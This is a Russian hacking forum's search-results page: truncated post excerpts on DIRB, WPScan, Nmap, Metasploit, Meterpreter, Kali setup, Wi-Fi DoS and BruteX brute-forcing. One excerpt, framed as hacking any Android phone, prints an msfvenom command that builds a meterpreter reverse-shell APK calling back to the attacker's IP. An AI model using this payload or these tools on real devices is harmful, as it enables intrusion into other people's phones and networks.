Результаты поиска

  1. Voodley

    DIRB: поиск скрытых каталогов и файлов на веб-сайтах

    DIRB — это сканер веб-контента. Он ищет существующие (возможно, скрытые) веб-объекты. В основе его работы лежит поиск по словарю, он формирует запросы к веб-серверу и анализирует ответ. DIRB поставляется с набором настроенных на атаку словарей для простого использования, но вы можете...
  2. Voodley

    Начинающим Сканируем на уязвимости WordPress: WPScanner

    WordPress завоевал заслуженную популярность. Каждый день запускается огромное количество новых сайтов на этом движке. Быстрее самого WordPress распространяются только дыры в скриптах, поскольку эти дыры могут быть не только в коде движка, но и в любом из огромного количества его плагинов и даже...
  3. Voodley

    Начинающим Разновидности вредоносного программного обеспечения.

    Всякий раз, когда компьютер начинает вести себя странно и перестает слушаться, первое, что приходит в голову — не заразился ли компьютер "вирусом". В таком случае страхи могут оказаться небезосновательными. Следовательно, желательно узнать об этих врагах компьютера и получить общее представление...
  4. Voodley

    Metasploit на простом языке.

    Гайд будет не очень большой,но многим он должен помочь.Итак приступим. После того как вы просканили ваш сайт(жертву) на наличие открытых портов и сервисов которые на них висят,приступаем к самому metasploit. Как его запустить? 1) service postgresql start 2) msfdb init 3) msfconsole Далее мы...
  5. Voodley

    Начинающим Что такое криптология

    ПРЕДМЕТ КРИПТОЛОГИИ Описание предмета криптологии начнем с доуточнения обиходного понятия информация. Иностранному термину информация достаточно близко отвечает русское слово смысл. Очевидно, что одну и ту же информацию можно передать разными сообщениями, например, на разных языках, а также...
  6. Voodley

    Новости История компьютерного андеграунда: Хакеры 80-х

    Из-за своего размера и космической цены, долгое время компьютеры были недоступны простым людям. Компанию IBM, владеющую в 50х гг. 95% всего компьютерного рынка, вполне устраивали многомиллионные продажи и правительственная клиентура. Поэтому ее руководство даже не пыталось начать разработки...
  7. Voodley

    Взламываем любой телефон на Android

    Установка и использование msfvenom payload: 1. Запустите kali и откройте панель управления. 2. Установите payload и создайте всплывающее окно пользователя вот этой командой: msfvenom -p android/meterpreter/reverse_tcp LHOST=указываем свой ip LPORT=4444 R > android.apk Файл apk сохранен в...
  8. Voodley

    Начинающим Как использовать Nmap

    Собираем информацию об открытых на сервере портах, запущенных службах и версиях программного обеспечения Это простая команда может использоваться для проверки доступен ли сайт (в данном случае я использовал сайт codeby.net). Обращаем внимание на открытые порты: nmap -sS [IPадрес] или [адрес...
  9. Voodley

    Начинающим Хакерские плагины для Firefox

    Подборка плагинов для тестировщиков на проникновение подсмотренная в Dojo. Знакомство с будущими целями нередко начинается в браузере. Глядя на сайт в окне браузера можно предположить используемый движок, можно попробовать повставлять кавычки и т. д. Кроме этого, браузер может стать полноценным...
  10. Voodley

    Как досить Wi-Fi,с Wifi_DoS

    Как запустить Wifi_DoS Глядя в исходный код Wifi_DoS, у меня появляются сомнения — работал ли он вообще когда-нибудь? Возможно, у кого-то и получалось запустить, но в определённых условиях. Там есть несколько неточностей, которые обязательно нужно исправить для нормальной работы. Прежде чем...
  11. Voodley

    Начинающим Лучшие хакерские программы

    Пароли Cain & Abel Cain & Abel — это инструмент по восстановлению пароля для операционной системы Microsoft. Этот инструмент позволяет восстановить пароли различного рода посредством прослушивания сети. CacheDump CacheDump, лицензирована под GPL, демонстрирует, как восстановить информацию...
  12. Voodley

    Kali Как поставить Tor браузер на kali linux 2.0

    Tor (The Onion Router) — свободное программное обеспечение для реализации второго поколения так называемой "луковой маршрутизации". Это система, позволяющая устанавливать анонимное сетевое соединение, защищённое от прослушивания. Рассматривается как анонимная сеть, предоставляющая передачу...
  13. Voodley

    Kali Как поставить VPN на Kali linux 2.0 and Kali Linux 1.x

    Для чего использовать VPN — какие преимущества? Здесь 11 главных причин, почему вас может заинтересовать использование служб VPN. VPN обеспечивает конфиденциальность и скрывает ваш IP адрес. Использование любой сети (публичной или частной или бесплатного WiFi) с шифрованием Конфиденциально...
  14. Voodley

    Meterpreter в деле

    Сегодня мы опять поговорим о такой прекрасной вещице, как Metasploit Framework. А если точнее, то о пасынке MSF – «нагрузке» Meterpreter. Это реально advanced payload с учетом всего, что туда вложено, а также того, что мы можем сделать своими ручками. Что это такое? Meterpreter – это нагрузка...
  15. Voodley

    Kali Как узнать движок сайта в Kali Linux

    Как с помощью WhatWeb узнать версию движка сайта Информация о движке и его версии очень важна при тестировании веб-приложений на проникновение. В первую очередь, эта информация будет использована для поиска эксплойтов и известных уязвимостей именно для этого движка этой версии. Это на порядок...
  16. Voodley

    BruteX: программа для автоматического брутфорса всех служб

    BruteX — это скрипт, автоматизирующий работу других программ (смотрите зависимости). И этот скрипт является прекрасным примером, для чего нужно изучать программирование шелл скриптов и как можно автоматизировать процесс анализа одной или многих целей. Как может проходить типичный анализ целевого...